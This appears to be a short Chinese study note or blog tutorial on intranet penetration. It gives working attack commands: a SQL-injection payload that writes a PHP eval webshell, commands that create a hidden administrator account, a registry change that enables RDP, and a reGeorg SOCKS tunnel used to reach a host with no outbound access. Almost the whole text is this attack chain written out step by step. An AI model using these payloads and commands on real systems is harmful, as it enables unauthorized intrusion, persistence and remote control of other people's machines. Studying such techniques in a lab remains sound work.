内网渗透1——远程连接

1.通过SQL注入在网站内部生成一句话木马

核心语句：union select 1,”<?php eval($_REQUEST[8]);?>” into outfile “C:/phpStudy/WWW/tu.php”

2.连接菜刀上传提权工具并且添加用户到用户组

核心命令：
1.exe -p “net user abc A1B1c1 /add” —— 添加新用户：abc 密码：A1B1c1
1.exe -p “net localgroup administrators abc /add” —— 将用户添加到用户组

3.查看是否已开启3389远程端口

结果：已开启
主动开启命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.在命令行查看是否能够连接外网

结果：无法访问外网，无法进行正常的远程连接

5.上传脚本文件（注意对应语言）用来控制远程主机

6.在本地运行py文件与上传的脚本文件进行关联

核心命令：reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://*.*.cn/脚本.php
意义：告诉脚本与本地的10086端口进行连接

7.在本地打开代理软件进行配置（做mstsc远程工具的代理）

配置文件 ——》代理服务器 ——》 添加/编辑

配置文件 ——》代理规则 ——》添加/编辑

8.在菜刀查看公网ip，本地打开mstsc远程工具进行远程连接

总结：在目标主机不能连接外网的情况下，我们植入自己的脚本与我们连接，我们控制脚本用脚本控制目标主机。

Tips：我也不太确定这个总结准不准确，欢迎各位补充。